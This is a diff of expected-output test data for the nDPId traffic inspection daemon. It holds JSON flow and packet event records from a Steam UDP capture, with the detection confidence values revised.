00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"steam.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1357332165288,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332165288,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARNw7AqLyVSKU9vLJhaYoALFeAVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":81,"source":"steam.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165288,"flow_last_seen":1357332165288,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165288,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.188","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":81,"source":"steam.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165288,"flow_last_seen":1357332165288,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165288,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.188","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":82,"source":"steam.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165288,"flow_last_seen":1357332165288,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165288,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"68.142.116.178","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"steam.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1357332165288,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332165288,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARBC\/AqLyVRI50srJhaYkALCSiVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} -00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":82,"source":"steam.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165288,"flow_last_seen":1357332165288,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165288,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"68.142.116.178","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":82,"source":"steam.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165288,"flow_last_seen":1357332165288,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165288,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"68.142.116.178","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":83,"source":"steam.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165289,"flow_last_seen":1357332165289,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165289,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.6","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"steam.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1357332165289,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332165289,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEAR+L3AqLyVUatzBrJhaYoALBkwVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} -00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":83,"source":"steam.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165289,"flow_last_seen":1357332165289,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165289,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.6","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":83,"source":"steam.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165289,"flow_last_seen":1357332165289,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165289,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.6","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"steam.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1357332165291,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1357332165291,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWUUAAIARDl7Qb4VUwKi8lWmKsmEANGnGVlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAAD\/WHUH0BAAA="} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"steam.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1357332165310,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1357332165310,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWUYAAIARquBEjnSywKi8lWmJsmEANI39VlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAA\/x7bdLIAAAA="} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":86,"source":"steam.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":1357332165330,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1357332165330,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWUcAAIAR3b5IpT28wKi8lWmKsmEANK1cVlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAARbG1YaUAAAA="} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":87,"source":"steam.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165337,"flow_last_seen":1357332165337,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165337,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.14","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"steam.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1357332165337,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332165337,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARkx7AqLyVkkKYDrJhaYoALLOQVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":87,"source":"steam.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165337,"flow_last_seen":1357332165337,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165337,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.14","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":87,"source":"steam.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165337,"flow_last_seen":1357332165337,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165337,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.14","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":88,"source":"steam.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165337,"flow_last_seen":1357332165337,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165337,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"69.28.145.171","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":88,"source":"steam.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1357332165337,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332165337,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEAR5qfAqLyVRRyRq7JhaYoALAcaVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":88,"source":"steam.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165337,"flow_last_seen":1357332165337,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165337,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"69.28.145.171","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":88,"source":"steam.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165337,"flow_last_seen":1357332165337,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165337,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"69.28.145.171","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":89,"source":"steam.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165337,"flow_last_seen":1357332165337,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165337,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.176","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":89,"source":"steam.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1357332165337,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332165337,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARNxrAqLyVSKU9sLJhaYkALFeNVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":89,"source":"steam.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165337,"flow_last_seen":1357332165337,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165337,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.176","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":89,"source":"steam.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165337,"flow_last_seen":1357332165337,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165337,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.176","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":90,"source":"steam.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1357332165344,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1357332165344,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWUgAAIARDlrQb4VVwKi8lWmJsmEANOC5VlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAApkPUDiMBAAA="} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":91,"source":"steam.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":2,"flow_last_seen":1357332165370,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1357332165370,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWUkAAIARjVZFHJGrwKi8lWmKsmEANABlVlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAAZ1y1R+AAAAA="} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"steam.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":2,"flow_last_seen":1357332165375,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1357332165375,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWUoAAIAR3cdIpT2wwKi8lWmJsmEANEZJVlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAApDC7AqgAAAA="} @@ -206,61 +206,61 @@ 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":94,"source":"steam.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1357332165425,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1357332165425,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWUwAAIAROcmSQpgPwKi8lWmJsmEANKyjVlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAAEZL3SfQAAAA="} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":95,"source":"steam.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":2,"flow_last_seen":1357332165520,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1357332165520,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWU0AAIAROcmSQpgOwKi8lWmKsmEANHO2VlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAAoWZRYkMBAAA="} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":96,"source":"steam.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":3,"flow_last_seen":1357332165586,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1357332165586,"pkt":"AFBW4RiuAAwp3FvtCABFAABEAABAAEARNwrAqLyVSKU9vLJhaYoAMEhAVlMwMQQAAwQABgAAAAAAAAEAAAABAAAAAQAAAAEAAAAEAAAAbm6TxQ=="} -00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1357332165137,"flow_last_seen":1357332165137,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.7","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} -00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1357332164737,"flow_last_seen":1357332164737,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.8","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} -00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1357332165138,"flow_last_seen":1357332165138,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.5","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} -00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1357332164694,"flow_last_seen":1357332164694,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.6","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} -00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1357332165289,"flow_last_seen":1357332165289,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.6","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} -00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1357332165037,"flow_last_seen":1357332165037,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.5","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} -00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1357332164786,"flow_last_seen":1357332164786,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.7","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} -00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1357332164694,"flow_last_seen":1357332164694,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.8","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} -00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1357332165287,"flow_last_seen":1357332165287,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.7","src_port":45665,"dst_port":27019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} -00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1357332164937,"flow_last_seen":1357332164937,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.5","src_port":45665,"dst_port":27019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} -00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1357332164837,"flow_last_seen":1357332164837,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.6","src_port":45665,"dst_port":27019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} -00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1357332164787,"flow_last_seen":1357332164787,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.8","src_port":45665,"dst_port":27019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} -00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164987,"flow_last_seen":1357332165020,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"69.28.145.171","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 